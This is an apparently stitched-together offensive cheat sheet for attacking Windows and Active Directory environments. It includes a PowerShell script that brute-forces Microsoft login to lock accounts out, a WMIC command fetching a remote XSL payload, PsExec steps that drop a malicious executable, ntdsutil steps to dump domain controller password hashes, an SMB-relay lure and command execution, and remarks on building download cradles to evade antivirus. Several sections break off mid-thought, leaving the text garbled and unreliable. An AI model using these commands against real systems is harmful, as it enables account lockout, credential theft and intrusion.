functionInvoke-BruteForceDoS{Param( [Parameter(Mandatory=$True)] [string]$User )while($true) { $randomGuid =New-Guid $body =@{"resource"= $randomGuid"client_id"= $randomGuid"grant_type"="password""username"= $User"password"= $randomGuid"scope"="openid" }try { $response=Invoke-RestMethod -UseBasicParsing -Uri "https://login.microsoftonline.com/common/oauth2/token" -ContentType "application/x-www-form-urlencoded" -Method POST -Body $body
}catch { $stream =$_.Exception.Response.GetResponseStream() $responseBytes =New-Object byte[] $stream.Length $stream.Position =0 $stream.Read($responseBytes,0,$stream.Length) |Out-Null $errorDetails = [text.encoding]::UTF8.GetString($responseBytes) | ConvertFrom-Json | Select -ExpandProperty error_description
$datacenter ="{0,-6}"-f ($_.Exception.Response.Headers["x-ms-ests-server"].Split(" ")[2]) }# Parse the error code.if(!$exists -and $errorDetails) { if($errorDetails.startsWith("AADSTS50053")) # The account is locked, you've tried to sign in too many times with an incorrect user ID or password.
{Write-Host"$($datacenter): [ LOCKED ] $user"-ForegroundColor Red } elseif($errorDetails.StartsWith("AADSTS50126")) # Error validating credentials due to invalid username or password.
{Write-Host"$($datacenter): [WRONGPWD] $user"-ForegroundColor Gray } elseif($errorDetails.StartsWith("AADSTS50034")) # The user account {identifier} does not exist in the {tenant} directory. To sign into this application, the account must be added to the directory.
{Write-Host"$($datacenter): [NOTFOUND] $user" } } }}
PowerShell Port Scanning:
Powershell Test-NetConnection, tnc for short, host and port scanning:
By default, Windows Server 2012R2 and later have PowerShell remote access turned on by default. Windows 10 and Windows 11 systems have this feature turned off by default. To turn on PowerShell remote access, an administrator can run the Enable-PSRemoting command:
PS C:\WINDOWS\system32> Enable-PSRemoting
With the appropriate permissions, remote access to PowerShell is straightforward: run Enter-PSSession and specify the target host name or IP address using -ComputerName:
wmic os get /format:"https://webserver/payload.xsl"
Examining Processes with WMIC:
wmic process list full
wmic process list brief
wmic process get name, parentprocessid,processid
wmic process where processid=pid get commandline
WMI Recon:
wmic process get CSName,Description,ExecutablePath,ProcessId
wmic useraccount list full
wmic group list full
wmic netuse list full
wmic qfe get Caption,Description,HotFixID,InstralledOn
wmic startup get Caption,Command,Location,User
tcpdump -i <interface> # Capture, can use "any"
tcpdump -i <interface> -w <file> # Write to a file after capture
tcpdump -r <file> -n # Read from a file and don't resolve hosts and ports
tcpdump -r <file> -n -A # Read from a file and don't resolve hosts and ports, show as ASCII
# Berkeley Packet Filtering
tcpdump -r <file> 'host 8.8.8.8'
tcpdump -r <file> 'src host 8.8.8.8'
tcpdump -r <file> 'not src host 8.8.8.8'
tcpdump -r <file> 'icmp and (src host 8.8.8.8'
PSExec'ing:
Running PsExec by uploading malicious executable:
# This will continue the PsExec session through named pipe, and will only terminate once the process is terminated. Additionally this -c parameter will manually cleanup the executable.
PsExec.exe /accepteula \\192.168.1.2 -u CORP\user -p password -c update.exe
# This will kill the PsExec session and leave the malicious executable on disk
PsExec.exe /accepteula \\192.168.1.2 -u CORP\user -p password -d update.exe
Windows Domain Controller Hash Harvesting:
GOAL: Obtain NTDS.dit and SYSTEM registry hive data
C:\Users\RoseSecurity> ntdsutil
ntdsutil: activate instance ntds
ntdsutil: ifm
ifm: create full c:\ntds
Copying registry files...
Copying c:\ntds\registry\SYSTEM
Copying c:\ntds\registry\SECURITY
IFM media created successfully in c:\ntds
ifm: quit
ntdsutil: quit
This are different types of download cradles which should be an inspiration to play and create new download cradles to bypass AV/EPP/EDR in context of download cradle detections. Notice, removing or obfuscating signatures from your download cradle is only one piece of the puzzle to bypass an AV/EPP/EDR. Depending on the respective product you have to modify your payload which should be downloaded by the cradle to bypass API-Hooking, Callbacks, AMSI etc.
Tool used for installation of AppX/MSIX applications on Windows 10. AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL and is saved in C:\Users%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache<RANDOM-8-CHAR-DIRECTORY>
Packet Monitor (Pktmon) is an in-box, cross-component network diagnostics tool for Windows. It can be used for packet capture, packet drop detection, packet filtering and counting.
Force authentication by crafting a HTML or file of your choice:
<html>
<h1>The Dietary Benefits of Eating Ben and Jerry's Phish Food</h1>
<img src="file://<Compromised Host>/download.jpg">
</html>
Fire up SMBRelayx tool that will listen for incoming SMB authentication requests and will relay them to the victim and will attempt to execute the command, ipconfig, on the end host:
smbrelayx.py -h <Victim IP> -c "ipconfig"
Active Directory DNS Enumeration:
The tool adidnsdump enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks.
SMB ( Server Message Block ) authentication without credentials, also known as anonymous SMB access, allows users to access shared resources on a network without providing username or passwords. This can be useful for accessing shared folders that have been configured to allow anonymous access.
Plundering Account Information with RPCClient and SMBClient:
Once you have a user name and password and open SMB access of a target Windows client or server over TCP port 445, you can use rpcclient to open an authenticated SMB session to a target machine by running the following command on your Linux system:
$ rpcclient —U <username> <winipaddr>
# If the server allows NULL sessions, the following command could be utilized
$ $ rpcclient —U "" <winipaddr>
If you find yourself on a locked down system and aren’t able to open a command prompt but do have access to Microsoft’s Paint program then this might be the hack for you; courtesy of Simon.
Load mspaint, it should start with a blank canvas
Use the resize menu option to change the drawing to 6 pixels wide by 1 pixel high.
Select the pencil drawing tool.
Use the Edit Colours option to create custom colours using the following RGB values:
After adding the file, we use the /SetNotifyCmdLine switch to execute the payload. This is done with the help of an action that we scripted. First, it will start the cmd.exe and then, it will complete the download and then it will execute the said command in the background.